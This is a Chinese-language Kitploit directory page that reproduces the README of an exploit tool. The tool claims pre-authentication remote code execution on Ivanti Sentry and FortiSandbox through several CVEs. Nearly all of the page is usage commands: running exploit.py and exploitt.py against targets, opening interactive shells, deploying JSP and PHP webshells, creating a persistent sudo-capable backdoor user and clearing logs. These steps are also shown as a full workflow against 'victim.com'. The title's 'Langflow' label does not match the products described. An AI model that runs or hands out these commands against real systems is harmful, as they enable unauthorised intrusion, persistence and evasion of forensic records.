Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-5027-Langflow — Multi-CVE漏洞利用工具,用于在Ivanti Sentry和FortiSandbox上实现未经认证的远程代码执行。功能包括交互式shell、webshell部署、后门用户创建以及日志清理,适用于渗透测试。 | Kitploit
工具/GitHubGitHub/layer-6/cve-2026-5027-langflow
权限提升持久化机制漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试命令与控制红队远程访问工具Payload 开发
73个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
layer-6/cve-2026-5027-langflow

CVE-2026-5027-Langflow

Multi-CVE漏洞利用工具,用于在Ivanti Sentry和FortiSandbox上实现未经认证的远程代码执行。功能包括交互式shell、webshell部署、后门用户创建以及日志清理,适用于渗透测试。

查看仓库

(CVE-2026-5027) 和 (CVE-2026-10520) (CVE-2026-25089) 利用工具:

克隆

root@kitploit:~
git clone https://github.com/Layer-6/CVE-2026-5027-Langflow.git
cd CVE-2026-5027-Langflow

使用 (exploit.py) 文件

自动测试和利用。

root@kitploit:~
python3 exploit.py -u https://target.com

CLI 自定义设置

当 webshell 位于文件夹内时使用自己的 webshell:

root@kitploit:~
python3 exploit.py -u https://target.com --shell 

(📁shells/my-shell.php)

当 webshell 位于工具文件夹中或终端内且不在文件夹中时:

root@kitploit:~
python3 exploit.py -u https://target.com --shell my-shell.php

您的 webshell 可以是 (PHP, Python (CGI), Perl, Ruby, ASPX)。

您可以使用 --t 设置超时,并使用 --p 从文件夹和文件中加载/使用 payload 或自定义路径:

root@kitploit:~
python3 exploit.py -u https://target.com | -t 58 | |-p payloads.txt | | --upload-paths Dirs.txt |

示例:

root@kitploit:~
python3 exploit.py -u https://target.com --shell shells/myshell.php -t 58 -p payloads.txt --upload-paths dirs.txt

使用 (exploitt.py) 文件

针对以下 CVE 设计:

· CVE-2026-10520 (CVSS 10.0)

· CVE-2026-25089 (CVSS 9.1)

预认证远程代码执行

无需凭据。

📖 使用方法

快速开始 - 交互式菜单(无参数)

root@kitploit:~
python3 exploitt.py

然后按照提示操作:

1. 选择目标类型 (Ivanti 或 Forti)

  1. 输入目标 URL (例如 https://192.168.1.100:8443)
  2. 设置超时、代理、调试模式
  3. 选择操作 (命令、shell、webshell 等)

命令行(高级)

1. Ivanti Sentry (CVE-2026-10520)

root@kitploit:~
# 检查是否存在漏洞
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -c "id"

# 交互式 shell
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -s

# 部署 JSP webshell (Tomcat)
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -w

# 创建后门用户 + 清除日志
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -p --clean
  1. FortiSandbox (CVE-2026-25089)
root@kitploit:~
# 单条命令
python3 exploitt.py -u https://forti.example.com --type forti -c "whoami"

# 交互式 shell 并支持文件上传
python3 exploitt.py -u https://forti.example.com --type forti -s
# 在 shell 内:upload /path/local.txt /remote/path.txt

# 部署 PHP webshell
python3 exploitt.py -u https://forti.example.com --type forti -w

# 完全自动攻破 (检查、shell、webshell、持久化、清除)
python3 exploitt.py -u https://forti.example.com --type forti -s -w -p --clean
  1. 自动检测(脚本猜测服务类型)
root@kitploit:~
python3 exploitt.py -u https://target.example.com -c "id"
  1. 使用代理和调试
root@kitploit:~
python3 exploitt.py -u https://target:8443 --proxy http://127.0.0.1:8080 --debug -c "uname -a"

可用的命令行参数

交互式 shell 命令

在交互式 shell 中,您可以使用:

命令示例描述
normal commandid执行任意系统命令
uploadupload exploit.sh /tmp/backdoor.sh将本地文件上传到远程主机
exitexit退出 shell

Webshell 部署细节

· Ivanti Sentry – 在 Tomcat webapps 中部署 .jsp shell (/usr/local/tomcat/webapps/ROOT/) · 通过 https://target/shell_random.jsp?cmd=whoami 访问 · FortiSandbox – 在 Web 根目录中部署 .php shell (/var/www/html/) · 通过 https://target/shell_random.php?cmd=whoami 访问

示例工作流程(完整渗透测试)

root@kitploit:~
# 1. 检测并利用
python3 exploitt.py -u https://victim.com:8443 --type ivanti -s

# 2. 在 shell 内,检查权限
id

# 3. 部署 webshell 以实现持久化
python3 exploitt.py -u https://victim.com:8443 --type ivanti -w

# 4. 创建后门用户
python3 exploitt.py -u https://victim.com:8443 --type ivanti -p

# 5. 清除日志
python3 exploitt.py -u https://victim.com:8443 --type ivanti --clean

由 Red Telegram 频道提供:

https://t.me/Red_Rooted_Ghost

下载工具
参数描述
-u, --url目标 URL (例如 https://192.168.1.100:8443)
--type强制服务类型: ivanti 或 forti (可选,自动检测)
-t, --timeout请求超时秒数 (默认 30)
--proxyHTTP/HTTPS 代理 (例如 http://127.0.0.1:8080)
-d, --debug启用调试输出
--ua自定义 User-Agent 字符串
-c, --cmd执行单个命令并退出
-s, --shell启动交互式 shell
-w, --webshell部署 webshell (Forti 使用 PHP, Ivanti 使用 JSP)
-p, --persist创建持久的 sudo 可用后门用户
--clean清除日志和命令历史记录